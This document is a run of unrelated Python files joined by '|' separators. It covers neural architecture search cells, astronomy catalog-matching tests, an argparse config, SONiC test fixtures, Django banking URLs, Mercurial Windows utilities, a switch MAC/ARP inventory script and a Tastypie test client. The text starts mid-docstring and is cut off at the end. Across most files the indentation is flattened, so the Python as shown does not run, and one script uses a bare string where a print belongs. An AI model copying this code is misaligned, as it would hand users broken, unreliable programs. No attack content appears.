            reduction_prev: flag for whether the previous cell is a reduction cell
            reduction_cur: flag for whether the current cell is a reduction cell
            search_space: search space object providing the candidate operations
        """
super(Cell, self).__init__()
self.reduction_cur = reduction_cur
self.num_nodes = num_nodes
# If previous cell is reduction cell, current input size does not match with
# output size of cell[k-2]. So the output[k-2] should be reduced by preprocessing
if reduction_prev:
self.preprocess0 = FactorizedReduce(c_prev_prev, c_cur)
else:
self.preprocess0 = StdConv(c_prev_prev, c_cur, kernel_size=1, stride=1, padding=0)
self.preprocess1 = StdConv(c_prev, c_cur, kernel_size=1, stride=1, padding=0)
# Generate dag from mixed operations
self.dag_ops = nn.ModuleList()
for i in range(self.num_nodes):
self.dag_ops.append(nn.ModuleList())
# Include 2 input nodes
for j in range(2+i):
# Reduction with stride = 2 must be only for the input node
stride = 2 if reduction_cur and j < 2 else 1
op = MixedOp(c_cur, stride, search_space)
self.dag_ops[i].append(op)
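    # Note: in forward(), w_dag is expected to mirror this structure -- one
    # weight tensor per intermediate node, of shape (i + 2, num_ops), typically
    # obtained by softmaxing the architecture parameters (see NetworkCNN.forward).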
def forward(self, s0, s1, w_dag):
s0 = self.preprocess0(s0)
s1 = self.preprocess1(s1)
states = [s0, s1]
for edges, w_list in zip(self.dag_ops, w_dag):
            state_cur = sum(edges[i](s, w) for i, (s, w) in enumerate(zip(states, w_list)))
states.append(state_cur)
state_out = torch.cat(states[2:], dim=1)
return state_out
class NetworkCNN(nn.Module):
def __init__(self, init_channels, input_channels, num_classes,
num_layers, criterion, search_space, num_nodes, stem_multiplier):
super(NetworkCNN, self).__init__()
self.init_channels = init_channels
self.num_classes = num_classes
self.num_layers = num_layers
self.criterion = criterion
# TODO: Algorithm settings?
self.num_nodes = num_nodes
self.stem_multiplier = stem_multiplier
c_cur = self.stem_multiplier*self.init_channels
self.stem = nn.Sequential(
nn.Conv2d(input_channels, c_cur, 3, padding=1, bias=False),
nn.BatchNorm2d(c_cur)
)
# In first Cell stem is used for s0 and s1
# c_prev_prev and c_prev - output channels size
# c_cur - init channels size
c_prev_prev, c_prev, c_cur = c_cur, c_cur, self.init_channels
self.cells = nn.ModuleList()
reduction_prev = False
for i in range(self.num_layers):
# For Network with 1 layer: Only Normal Cell
if self.num_layers == 1:
reduction_cur = False
else:
# For Network with two layers: First layer - Normal, Second - Reduction
# For Other Networks: [1/3, 2/3] Layers - Reduction cell with double channels
# Others - Normal cell
if ((self.num_layers == 2 and i == 1) or
(self.num_layers > 2 and i in [self.num_layers//3, 2*self.num_layers//3])):
c_cur *= 2
reduction_cur = True
else:
reduction_cur = False
cell = Cell(self.num_nodes, c_prev_prev, c_prev, c_cur, reduction_prev, reduction_cur, search_space)
reduction_prev = reduction_cur
self.cells.append(cell)
c_cur_out = c_cur * self.num_nodes
c_prev_prev, c_prev = c_prev, c_cur_out
self.global_pooling = nn.AdaptiveAvgPool2d(1)
self.classifier = nn.Linear(c_prev, self.num_classes)
# Initialize alphas parameters
num_ops = len(search_space.primitives)
self.alpha_normal = nn.ParameterList()
self.alpha_reduce = nn.ParameterList()
for i in range(self.num_nodes):
self.alpha_normal.append(nn.Parameter(1e-3*torch.randn(i+2, num_ops)))
if self.num_layers > 1:
self.alpha_reduce.append(nn.Parameter(1e-3*torch.randn(i+2, num_ops)))
# Setup alphas list
self.alphas = []
for name, parameter in self.named_parameters():
if "alpha" in name:
self.alphas.append((name, parameter))
def forward(self, x):
weights_normal = [F.softmax(alpha, dim=-1) for alpha in self.alpha_normal]
weights_reduce = [F.softmax(alpha, dim=-1) for alpha in self.alpha_reduce]
s0 = s1 = self.stem(x)
for cell in self.cells:
weights = weights_reduce if cell.reduction_cur else weights_normal
s0, s1 = s1, cell(s0, s1, weights)
out = self.global_pooling(s1)
# Make out flatten
out = out.view(out.size(0), -1)
logits = self.classifier(out)
return logits
def print_alphas(self):
print("\n>>> Alphas Normal <<<")
for alpha in self.alpha_normal:
print(F.softmax(alpha, dim=-1))
if self.num_layers > 1:
print("\n>>> Alpha Reduce <<<")
for alpha in self.alpha_reduce:
print(F.softmax(alpha, dim=-1))
print("\n")
def getWeights(self):
return self.parameters()
def getAlphas(self):
for _, parameter in self.alphas:
yield parameter
def loss(self, x, y):
logits = self.forward(x)
return self.criterion(logits, y)
def genotype(self, search_space):
gene_normal = search_space.parse(self.alpha_normal, k=2)
gene_reduce = search_space.parse(self.alpha_reduce, k=2)
# concat all intermediate nodes
concat = range(2, 2 + self.num_nodes)
return search_space.genotype(normal=gene_normal, normal_concat=concat,
reduce=gene_reduce, reduce_concat=concat)
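# Construction sketch (assumes a `search_space` object from the accompanying
# search-space module exposing `primitives`, `parse` and `genotype`):
#
#   criterion = nn.CrossEntropyLoss()
#   model = NetworkCNN(init_channels=16, input_channels=3, num_classes=10,
#                      num_layers=8, criterion=criterion,
#                      search_space=search_space, num_nodes=4,
#                      stem_multiplier=3)
#   logits = model(torch.randn(2, 3, 32, 32))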
|
#!/usr/bin/python
from Bio import SeqIO
|
import os
import skylink
from skylink import testing
import numpy as np
from astropy.table import Table
import FoFCatalogMatching
import pytest # noqa
# TODO: test the matching with more than two catalogs
# TODO: test N-way matching with `linking_lengths` as a dictionary
# TODO: test if we catch illegal footprints that are not gnomonic-projectable
# TODO: test MPI implementation
# TODO: test a wide range of linking lengths
graph_lib = "networkx"
ncpus_max = os.cpu_count() # maximum number of cpus
linking_lengths_default = 0.75 # arcsec
n = 2_000 # number of objects for the mock-up data
def make_mockup():
def tnormal(mu=None, sigma=None, n=None, lower=-0.5, upper=0.5):
return np.clip(np.random.normal(np.repeat(mu, n), sigma), lower, upper)
np.random.seed(2)
ra = np.random.uniform(4, 6, n)
dec = np.random.uniform(-1, 1, n)
cat_a = Table({"ra": ra, "dec": dec})
cat_b = Table(
{
"ra": np.append(ra + tnormal(0, 0.0004, n), ra + tnormal(0, 0.0001, n)),
"dec": np.append(dec + tnormal(0, 0.0002, n), dec + tnormal(0, 0.0002, n)),
}
)
return cat_a, cat_b
def run_FoFCatalogMatching(cat_a, cat_b, return_pandas=False):
""" Genetare an output using `FoFCatalogMatching` as our benchmark """
res_fcm = FoFCatalogMatching.match(
{"a": cat_a, "b": cat_b}, linking_lengths_default
)
if return_pandas:
return res_fcm.to_pandas()
else:
return res_fcm
def test_graph_lib():
cat_a, cat_b = make_mockup()
res_fcm = run_FoFCatalogMatching(cat_a, cat_b, return_pandas=True)
res_sl = skylink.match(
{"a": cat_a, "b": cat_b},
linking_lengths=linking_lengths_default,
graph_lib=graph_lib,
nprocs=ncpus_max,
silent=True,
return_pandas=True,
use_linked_mask=False,
)
testing.assert_equal(res_fcm, res_sl)
def run_with_ncpus(cat_a, cat_b, ncpus):
return skylink.match(
{"a": cat_a, "b": cat_b},
linking_lengths=linking_lengths_default,
graph_lib=graph_lib,
nprocs=ncpus,
silent=True,
return_pandas=True,
use_linked_mask=False,
)
def test_nprocs():
# TODO: test equality with more than 2 catalogs
cat_a, cat_b = make_mockup()
res_fcm = run_FoFCatalogMatching(cat_a, cat_b, return_pandas=True)
res_sl1 = run_with_ncpus(cat_a, cat_b, 1)
res_sl2 = run_with_ncpus(cat_a, cat_b, 2)
res_sl3 = run_with_ncpus(cat_a, cat_b, ncpus_max)
testing.assert_equal(res_fcm, res_sl1)
testing.assert_equal(res_sl1, res_sl2)
testing.assert_equal(res_sl2, res_sl3)
def run_with_overlap(cat_a, cat_b, overlap):
return skylink.match(
{"a": cat_a, "b": cat_b},
linking_lengths=linking_lengths_default,
graph_lib=graph_lib,
overlap=overlap,
nprocs=ncpus_max,
silent=True,
return_pandas=True,
use_linked_mask=False,
)
def test_overlap():
cat_a, cat_b = make_mockup()
res_fcm = run_FoFCatalogMatching(cat_a, cat_b, return_pandas=True)
res_sl1 = run_with_overlap(cat_a, cat_b, 1.0)
res_sl2 = run_with_overlap(cat_a, cat_b, 1.1)
res_sl3 = run_with_overlap(cat_a, cat_b, 1.2)
testing.assert_equal(res_fcm, res_sl1)
testing.assert_equal(res_sl1, res_sl2)
testing.assert_equal(res_sl2, res_sl3)
def run_with_linked_mask(cat_a, cat_b, use_linked_mask):
return skylink.match(
{"a": cat_a, "b": cat_b},
linking_lengths=linking_lengths_default,
graph_lib=graph_lib,
use_linked_mask=use_linked_mask,
nprocs=ncpus_max,
silent=True,
return_pandas=True,
)
@pytest.mark.skip(
reason="FIXME: The `networkx` graph library does not give the right results with use_linked_mask=True"
)
def test_linked_mask():
cat_a, cat_b = make_mockup()
res_fcm = run_FoFCatalogMatching(cat_a, cat_b, return_pandas=True)
res_sl1 = run_with_linked_mask(cat_a, cat_b, True)
res_sl2 = run_with_linked_mask(cat_a, cat_b, False)
testing.assert_equal(res_fcm, res_sl1)
testing.assert_equal(res_sl1, res_sl2)
def run_with_order(cat_a, cat_b, reverse=False):
cats = {"b": cat_b, "a": cat_a} if reverse else {"a": cat_a, "b": cat_b}
return skylink.match(
cats,
linking_lengths=linking_lengths_default,
graph_lib=graph_lib,
nprocs=ncpus_max,
silent=True,
return_pandas=True,
use_linked_mask=False,
)
def test_cat_orders():
cat_a, cat_b = make_mockup()
res_fcm = run_FoFCatalogMatching(cat_a, cat_b, return_pandas=True)
res_sl1 = run_with_order(cat_a, cat_b, False)
res_sl2 = run_with_order(cat_a, cat_b, True)
testing.assert_equal(res_fcm, res_sl1)
testing.assert_equal(res_sl1, res_sl2)
def run_with_sort(cat_a, cat_b, sort):
return skylink.match(
{"a": cat_a, "b": cat_b},
linking_lengths=linking_lengths_default,
graph_lib=graph_lib,
sort=sort,
nprocs=ncpus_max,
silent=True,
return_pandas=True,
use_linked_mask=False,
)
def test_sort():
cat_a, cat_b = make_mockup()
res_fcm = run_FoFCatalogMatching(cat_a, cat_b, return_pandas=True)
res_sl1 = run_with_sort(cat_a, cat_b, True)
res_sl2 = run_with_sort(cat_a, cat_b, False)
testing.assert_equal(res_fcm, res_sl1)
testing.assert_equal(res_sl1, res_sl2)
def run_with_storekdtree(cat_a, cat_b, storekdtree):
return skylink.match(
{"a": cat_a, "b": cat_b},
linking_lengths=linking_lengths_default,
graph_lib=graph_lib,
storekdtree=storekdtree,
nprocs=ncpus_max,
silent=True,
return_pandas=True,
use_linked_mask=False,
)
def test_storekdtree():
cat_a, cat_b = make_mockup()
res_fcm = run_FoFCatalogMatching(cat_a, cat_b, return_pandas=True)
res_sl2 = run_with_storekdtree(cat_a, cat_b, False)
res_sl1 = run_with_storekdtree(cat_a, cat_b, True)
testing.assert_equal(res_fcm, res_sl1)
testing.assert_equal(res_sl1, res_sl2)
|
import argparse
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument(
'--model_dir', default='./text_training',
help='Output directory for model and training stats.')
parser.add_argument(
'--data_dir', default='./text_data',
help='Directory to download the data to.')
parser.add_argument('--model', default='convolutional')
parser.add_argument('--number_of_filters', default="16,8,8")
parser.add_argument('--dense_layers', default="1:1024,2:512", type=str)
parser.add_argument('--number_of_tokens', default=144, type=int)
parser.add_argument('--is_l2_normed', default=True, type=str2bool)
parser.add_argument(
'--batch_size', type=int, default=64,
        help='Batch size (default: 64)')
parser.add_argument(
'--noise_factor', type=float, default=0.5,
        help='Amount of noise to add to input (default: 0.5)')
parser.add_argument(
'--dropout', type=float, default=0.5,
        help='The probability that each element is kept in dropout layers (default: 0.5)')
parser.add_argument(
'--loss', type=str, default="custom_distance_loss")
parser.add_argument(
'--learning_rate', type=float, default=0.001,
help='Learning rate (default: 0.001)')
parser.add_argument(
'--epochs', type=int, default=50,
help='Number of epochs to perform for training (default: 50)')
parser.add_argument(
'--weight_decay', type=float, default=1e-5,
help='Amount of weight decay to apply (default: 1e-5)')
parser.add_argument(
'--save_images',
help='Path to directory to store intermediate reconstructed images (default: disabled)')
parser.add_argument(
'--images', type=int, default=10,
help='Number of test images to reconstruct (default: 10)')
parser.add_argument(
'--what', choices=['reconstruction', 'embedding'],
default='embedding',
help='Whether to display reconstructed images or '
'create checkpoint with encoder output to visualize '
'in TensorBoard.')
return parser
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def extract_number_of_filters(number_of_filters_as_arg):
    return [int(f.strip()) for f in number_of_filters_as_arg.split(',')]
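# Usage sketch (assuming this module is imported as-is):
#
#   parser = get_parser()
#   args = parser.parse_args(['--batch_size', '32', '--is_l2_normed', 'no'])
#   filters = extract_number_of_filters(args.number_of_filters)  # -> [16, 8, 8]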
|
import pytest
import logging
import time
from tests.common.dualtor.dual_tor_utils import get_crm_nexthop_counter # lgtm[py/unused-import]
from tests.common.helpers.assertions import pytest_assert as py_assert
from tests.common.fixtures.ptfhost_utils import change_mac_addresses, run_garp_service
CRM_POLL_INTERVAL = 1
CRM_DEFAULT_POLL_INTERVAL = 300
@pytest.fixture
def set_crm_polling_interval(rand_selected_dut):
"""
A function level fixture to set crm polling interval to 1 second
"""
wait_time = 2
logging.info("Setting crm polling interval to {} seconds".format(CRM_POLL_INTERVAL))
rand_selected_dut.command("crm config polling interval {}".format(CRM_POLL_INTERVAL))
logging.info("Waiting {} sec for CRM counters to become updated".format(wait_time))
time.sleep(wait_time)
yield
logging.info("Setting crm polling interval to {} seconds".format(CRM_DEFAULT_POLL_INTERVAL))
rand_selected_dut.command("crm config polling interval {}".format(CRM_DEFAULT_POLL_INTERVAL))
@pytest.fixture
def verify_crm_nexthop_counter_not_increased(rand_selected_dut, set_crm_polling_interval):
"""
A function level fixture to verify crm nexthop counter not increased
"""
original_counter = get_crm_nexthop_counter(rand_selected_dut)
logging.info("Before test: crm nexthop counter = {}".format(original_counter))
yield
time.sleep(CRM_POLL_INTERVAL)
diff = get_crm_nexthop_counter(rand_selected_dut) - original_counter
logging.info("Before test: crm nexthop counter = {}".format(original_counter + diff))
py_assert(diff <= 0, "crm nexthop counter is increased by {}.".format(diff))
def pytest_addoption(parser):
"""
Adds pytest options that are used by dual ToR tests
"""
dual_tor_group = parser.getgroup("Dual ToR test suite options")
dual_tor_group.addoption(
"--mux-stress-count",
action="store",
default=2,
type=int,
help="The number of iterations for mux stress test"
)
@pytest.fixture(scope="module", autouse=True)
def common_setup_teardown(request, tbinfo, vmhost):
if 'dualtor' in tbinfo['topo']['name']:
request.getfixturevalue('run_garp_service')
vmhost.shell('systemctl restart mux-simulator')
|
from __future__ import division, print_function
from libtbx.clear_paths \
import remove_or_rename_files_and_directories_if_possible
import sys
def run(args):
remaining = remove_or_rename_files_and_directories_if_possible(paths=args)
for path in remaining:
"WARNING: unable to remove or rename:", path
if (__name__ == "__main__"):
run(args=sys.argv[1:])
|
from django.urls import path
from . import views
urlpatterns = [
path('open-account/',
views.OpenAccountAPIView.as_view(),
name='open_account'),
path('delete-account/<pk>/',
views.DeleteAccountAPIView.as_view(),
name='delete_account'),
path('deposit/<pk>/',
views.DepositAPIView.as_view(),
name='deposit'),
path('withdraw/<pk>/',
views.WithdrawAPIView.as_view(),
name='withdraw'),
path('transfer/<pk>/',
views.TransferAPIView.as_view(),
name='transfer'),
path('create-branch/',
views.CreateBranchAPIView.as_view(),
name='create_branch')
]
|
# win32.py - utility functions that use win32 API
#
# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
"""Utility functions that use win32 API.
Mark Hammond's win32all package allows better functionality on
Windows. This module overrides definitions in util.py. If not
available, import of this module will fail, and generic code will be
used.
"""
import win32api
import errno, os, sys, pywintypes, win32con, win32file, win32process
import winerror, win32gui
import osutil, encoding
from win32com.shell import shell, shellcon
def os_link(src, dst):
try:
win32file.CreateHardLink(dst, src)
# CreateHardLink sometimes succeeds on mapped drives but
# following nlinks() returns 1. Check it now and bail out.
if nlinks(src) < 2:
try:
win32file.DeleteFile(dst)
except:
pass
# Fake hardlinking error
raise OSError(errno.EINVAL, 'Hardlinking not supported')
except pywintypes.error, details:
raise OSError(errno.EINVAL, 'target implements hardlinks improperly')
    except NotImplementedError: # Another fake error on Win98
raise OSError(errno.EINVAL, 'Hardlinking not supported')
def _getfileinfo(pathname):
"""Return number of hardlinks for the given file."""
try:
fh = win32file.CreateFile(pathname,
win32file.GENERIC_READ, win32file.FILE_SHARE_READ,
None, win32file.OPEN_EXISTING, 0, None)
try:
return win32file.GetFileInformationByHandle(fh)
finally:
fh.Close()
except pywintypes.error:
return None
def nlinks(pathname):
"""Return number of hardlinks for the given file."""
res = _getfileinfo(pathname)
if res is not None:
return res[7]
else:
return os.lstat(pathname).st_nlink
def samefile(fpath1, fpath2):
"""Returns whether fpath1 and fpath2 refer to the same file. This is only
guaranteed to work for files, not directories."""
res1 = _getfileinfo(fpath1)
res2 = _getfileinfo(fpath2)
if res1 is not None and res2 is not None:
# Index 4 is the volume serial number, and 8 and 9 contain the file ID
return res1[4] == res2[4] and res1[8] == res2[8] and res1[9] == res2[9]
else:
return False
def samedevice(fpath1, fpath2):
"""Returns whether fpath1 and fpath2 are on the same device. This is only
guaranteed to work for files, not directories."""
res1 = _getfileinfo(fpath1)
res2 = _getfileinfo(fpath2)
if res1 is not None and res2 is not None:
return res1[4] == res2[4]
else:
return False
def testpid(pid):
'''return True if pid is still running or unable to
determine, False otherwise'''
try:
handle = win32api.OpenProcess(
win32con.PROCESS_QUERY_INFORMATION, False, pid)
if handle:
status = win32process.GetExitCodeProcess(handle)
return status == win32con.STILL_ACTIVE
except pywintypes.error, details:
return details[0] != winerror.ERROR_INVALID_PARAMETER
return True
def lookup_reg(key, valname=None, scope=None):
''' Look up a key/value name in the Windows registry.
valname: value name. If unspecified, the default value for the key
is used.
scope: optionally specify scope for registry lookup, this can be
a sequence of scopes to look up in order. Default (CURRENT_USER,
LOCAL_MACHINE).
'''
try:
from _winreg import HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, \
QueryValueEx, OpenKey
except ImportError:
return None
if scope is None:
scope = (HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE)
elif not isinstance(scope, (list, tuple)):
scope = (scope,)
for s in scope:
try:
val = QueryValueEx(OpenKey(s, key), valname)[0]
# never let a Unicode string escape into the wild
return encoding.tolocal(val.encode('UTF-8'))
except EnvironmentError:
pass
def system_rcpath_win32():
'''return default os-specific hgrc search path'''
proc = win32api.GetCurrentProcess()
try:
# This will fail on windows < NT
filename = win32process.GetModuleFileNameEx(proc, 0)
except:
filename = win32api.GetModuleFileName(0)
# Use mercurial.ini found in directory with hg.exe
progrc = os.path.join(os.path.dirname(filename), 'mercurial.ini')
if os.path.isfile(progrc):
return [progrc]
# Use hgrc.d found in directory with hg.exe
progrcd = os.path.join(os.path.dirname(filename), 'hgrc.d')
if os.path.isdir(progrcd):
rcpath = []
for f, kind in osutil.listdir(progrcd):
if f.endswith('.rc'):
rcpath.append(os.path.join(progrcd, f))
return rcpath
# else look for a system rcpath in the registry
try:
value = win32api.RegQueryValue(
win32con.HKEY_LOCAL_MACHINE, 'SOFTWARE\\Mercurial')
rcpath = []
for p in value.split(os.pathsep):
if p.lower().endswith('mercurial.ini'):
rcpath.append(p)
elif os.path.isdir(p):
for f, kind in osutil.listdir(p):
if f.endswith('.rc'):
rcpath.append(os.path.join(p, f))
return rcpath
except pywintypes.error:
return []
def user_rcpath_win32():
'''return os-specific hgrc search path to the user dir'''
userdir = os.path.expanduser('~')
if sys.getwindowsversion()[3] != 2 and userdir == '~':
# We are on win < nt: fetch the APPDATA directory location and use
# the parent directory as the user home dir.
appdir = shell.SHGetPathFromIDList(
shell.SHGetSpecialFolderLocation(0, shellcon.CSIDL_APPDATA))
userdir = os.path.dirname(appdir)
return [os.path.join(userdir, 'mercurial.ini'),
os.path.join(userdir, '.hgrc')]
def getuser():
'''return name of current user'''
return win32api.GetUserName()
def set_signal_handler_win32():
"""Register a termination handler for console events including
CTRL+C. python signal handlers do not work well with socket
operations.
"""
def handler(event):
win32process.ExitProcess(1)
win32api.SetConsoleCtrlHandler(handler)
def hidewindow():
def callback(*args, **kwargs):
hwnd, pid = args
wpid = win32process.GetWindowThreadProcessId(hwnd)[1]
if pid == wpid:
win32gui.ShowWindow(hwnd, win32con.SW_HIDE)
pid = win32process.GetCurrentProcessId()
win32gui.EnumWindows(callback, pid)
|
#from excel_work import*
from common_functions import *
from pull import *
#from mac_and_arp_work import *
from napalm import get_network_driver
from getpass import getpass
from pprint import pprint
from name_work import *
import os
import socket
import openpyxl
from openpyxl import Workbook
from openpyxl.compat import range
from openpyxl.utils import get_column_letter
def write_excel_data(row,column,value,sheet):
tmp = str(get_column_letter(column))+str(row)
sheet[tmp] = value
return column+1
username = input("Username: ")
password = getpass()
def normalize_mac (mac):
mac = mac.strip(" ")
mac = mac.replace('.','')
mac = mac.upper()
t = iter(mac)
mac = ':'.join(a+b for a,b in zip(t, t))
return mac
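# e.g. normalize_mac('0011.2233.4455') -> '00:11:22:33:44:55'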
def pull_mac_table (net_connect):
mac_table_list = []
mac_table = net_connect.send_command_expect('sh mac address-table')
for line in mac_table.split('\n'):
mac_int = {}
line = line.lstrip(" ")
line = line.rstrip(" ")
if len(get_mac (line)) == 0:
continue
mac = normalize_mac (get_mac (line)[0])
if mac =='FF:FF:FF:FF:FF:FF':
continue
mac_int['mac']= mac
#print (line.split(" ")[-1])
interface = normalize_interface_names(line.split(" ")[-1])
mac_int['interface'] = interface
mac_table_list.append(mac_int)
return mac_table_list
def ouicorrect(list):
    # Normalize the first 7 characters (the OUI prefix) of each entry so they
    # match the format produced by normalize_mac above.
    templist = []
    for oui in list:
        templist.append(normalize_mac (oui[0:7]))
    return (templist)
def check_ouis(folder_name):
os.chdir(folder_name)
files = os.listdir()
#print (files)
OUIs = {}
for file in files:
q =open(file).readlines()
fixed_oui = ouicorrect (q)
for each_oui in fixed_oui:
OUIs [each_oui]= file
os.chdir(os.pardir)
return OUIs
def pull_oui_type(mac_address,OUIs):
mac_oui = mac_address[0:8]
if mac_oui in OUIs:
#print ("ITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKEDITWORKED")
return OUIs[mac_oui]
else:
#print (mac_oui)
return "Unknown"
driver = get_network_driver('ios')
to_check = read_doc ('pull_these.csv')
cdp_file_name= "temp_cdp_info.txt"
##device = driver("10.9.106.238", username,password)
#device.open()
#pprint(device.get_mac_address_table())
interfaces =[]
wb = openpyxl.Workbook()
folder_name = "OUIs"
OUIs = check_ouis(folder_name)
for device_and_arp in to_check:
print (device_and_arp)
# try:
interfaces = []
switch_to_check = device_and_arp.split(',')[0]
arp_device = device_and_arp.split(',')[1]
arp_device = arp_device.rstrip("\n")
print ("working on "+switch_to_check )
driver = get_network_driver('ios')
device = driver(arp_device, username,password)
device.open()
arp_table = device.get_arp_table()
net_connect = make_connection (switch_to_check,username,password)
mac_table = pull_mac_table (net_connect)
#pprint (mac_table )
#pprint(arp_table)
for mac_entry in mac_table:
for arp_entry in arp_table:
if mac_entry['mac'] == arp_entry['mac']:
tmp = {}
tmp['mac'] = mac_entry['mac']
tmp['interface'] = mac_entry['interface']
tmp['ip'] = arp_entry['ip']
tmp['type'] = pull_oui_type(tmp['mac'],OUIs)
try:
tmp['hostname'] = socket.gethostbyaddr(tmp['ip'])[0]
#print (tmp['hostname'])
except:
tmp['hostname'] = "Unknown"
interfaces.append(tmp)
#pprint (interfaces)
sheet = wb.create_sheet(switch_to_check)
row = 1
for interface in interfaces:
column = 1
if interface['interface'] == "Switch":
continue
column = write_excel_data(row,column,interface['interface'],sheet)
column = write_excel_data(row,column,interface['ip'],sheet)
column = write_excel_data(row,column,interface['type'],sheet)
column = write_excel_data(row,column,interface['hostname'],sheet)
column = write_excel_data(row,column,interface['mac'],sheet)
row = row+1
row = row+1
file_name = switch_to_check+ " show cdp"
pull_cdp_output(switch_to_check,username,password,file_name)
#cdp_info = cdp_info.split('\n')
for each in parse_cdp_out(file_name):
column = 1
column = write_excel_data(row,column,each['remote_id'],sheet)
column = write_excel_data(row,column,each['remote_ip'],sheet)
column = write_excel_data(row,column,each['local_int'],sheet)
column = write_excel_data(row,column,each['remote_int'],sheet)
column = write_excel_data(row,column,each['platform'],sheet)
row = row+1
# except:
# print(switch_to_check+ " Didn't work"+switch_to_check+ " Didn't work"+switch_to_check+ " Didn't work"+switch_to_check+ " Didn't work")
wb.save('output.xlsx')
|
from __future__ import unicode_literals
import time
from django.conf import settings
from django.test import TestCase
from django.test.client import FakePayload, Client
from django.utils.encoding import force_text
from tastypie.serializers import Serializer
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
class TestApiClient(object):
def __init__(self, serializer=None):
"""
Sets up a fresh ``TestApiClient`` instance.
If you are employing a custom serializer, you can pass the class to the
``serializer=`` kwarg.
"""
self.client = Client()
self.serializer = serializer
if not self.serializer:
self.serializer = Serializer()
def get_content_type(self, short_format):
"""
Given a short name (such as ``json`` or ``xml``), returns the full content-type
for it (``application/json`` or ``application/xml`` in this case).
"""
return self.serializer.content_types.get(short_format, 'json')
def get(self, uri, format='json', data=None, authentication=None, **kwargs):
"""
Performs a simulated ``GET`` request to the provided URI.
Optionally accepts a ``data`` kwarg, which in the case of ``GET``, lets you
send along ``GET`` parameters. This is useful when testing filtering or other
things that read off the ``GET`` params. Example::
from tastypie.test import TestApiClient
client = TestApiClient()
response = client.get('/api/v1/entry/1/', data={'format': 'json', 'title__startswith': 'a', 'limit': 20, 'offset': 60})
Optionally accepts an ``authentication`` kwarg, which should be an HTTP header
with the correct authentication data already setup.
All other ``**kwargs`` passed in get passed through to the Django
``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client
for details.
"""
content_type = self.get_content_type(format)
kwargs['HTTP_ACCEPT'] = content_type
# GET & DELETE are the only times we don't serialize the data.
if data is not None:
kwargs['data'] = data
if authentication is not None:
kwargs['HTTP_AUTHORIZATION'] = authentication
return self.client.get(uri, **kwargs)
def post(self, uri, format='json', data=None, authentication=None, **kwargs):
"""
Performs a simulated ``POST`` request to the provided URI.
Optionally accepts a ``data`` kwarg. **Unlike** ``GET``, in ``POST`` the
``data`` gets serialized & sent as the body instead of becoming part of the URI.
Example::
from tastypie.test import TestApiClient
client = TestApiClient()
response = client.post('/api/v1/entry/', data={
'created': '2012-05-01T20:02:36',
'slug': 'another-post',
'title': 'Another Post',
'user': '/api/v1/user/1/',
})
Optionally accepts an ``authentication`` kwarg, which should be an HTTP header
with the correct authentication data already setup.
All other ``**kwargs`` passed in get passed through to the Django
``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client
for details.
"""
content_type = self.get_content_type(format)
kwargs['content_type'] = content_type
if data is not None:
kwargs['data'] = self.serializer.serialize(data, format=content_type)
if authentication is not None:
kwargs['HTTP_AUTHORIZATION'] = authentication
return self.client.post(uri, **kwargs)
def put(self, uri, format='json', data=None, authentication=None, **kwargs):
"""
Performs a simulated ``PUT`` request to the provided URI.
Optionally accepts a ``data`` kwarg. **Unlike** ``GET``, in ``PUT`` the
``data`` gets serialized & sent as the body instead of becoming part of the URI.
Example::
from tastypie.test import TestApiClient
client = TestApiClient()
response = client.put('/api/v1/entry/1/', data={
'created': '2012-05-01T20:02:36',
'slug': 'another-post',
'title': 'Another Post',
'user': '/api/v1/user/1/',
})
Optionally accepts an ``authentication`` kwarg, which should be an HTTP header
with the correct authentication data already setup.
All other ``**kwargs`` passed in get passed through to the Django
``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client
for details.
"""
content_type = self.get_content_type(format)
kwargs['content_type'] = content_type
if data is not None:
kwargs['data'] = self.serializer.serialize(data, format=content_type)
if authentication is not None:
kwargs['HTTP_AUTHORIZATION'] = authentication
return self.client.put(uri, **kwargs)
def patch(self, uri, format='json', data=None, authentication=None, **kwargs):
"""
Performs a simulated ``PATCH`` request to the provided URI.
Optionally accepts a ``data`` kwarg. **Unlike** ``GET``, in ``PATCH`` the
``data`` gets serialized & sent as the body instead of becoming part of the URI.
Example::
from tastypie.test import TestApiClient
client = TestApiClient()
response = client.patch('/api/v1/entry/1/', data={
'created': '2012-05-01T20:02:36',
'slug': 'another-post',
'title': 'Another Post',
'user': '/api/v1/user/1/',
})
Optionally accepts an ``authentication`` kwarg, which should be an HTTP header
with the correct authentication data already setup.
All other ``**kwargs`` passed in get passed through to the Django
``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client
for details.
"""
content_type = self.get_content_type(format)
kwargs['content_type'] = content_type
if data is not None:
kwargs['data'] = self.serializer.serialize(data, format=content_type)
if authentication is not None:
kwargs['HTTP_AUTHORIZATION'] = authentication
# This hurts because Django doesn't support PATCH natively.
parsed = urlparse(uri)
r = {
'CONTENT_LENGTH': len(kwargs['data']),
'CONTENT_TYPE': content_type,
'PATH_INFO': self.client._get_path(parsed),
'QUERY_STRING': parsed[4],
'REQUEST_METHOD': 'PATCH',
'wsgi.input': FakePayload(kwargs['data']),
}
r.update(kwargs)
return self.client.request(**r)
def delete(self, uri, format='json', data=None, authentication=None, **kwargs):
"""
Performs a simulated ``DELETE`` request to the provided URI.
Optionally accepts a ``data`` kwarg, which in the case of ``DELETE``, lets you
send along ``DELETE`` parameters. This is useful when testing filtering or other
things that read off the ``DELETE`` params. Example::
from tastypie.test import TestApiClient
client = TestApiClient()
response = client.delete('/api/v1/entry/1/', data={'format': 'json'})
Optionally accepts an ``authentication`` kwarg, which should be an HTTP header
with the correct authentication data already setup.
All other ``**kwargs`` passed in get passed through to the Django
``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client
for details.
"""
content_type = self.get_content_type(format)
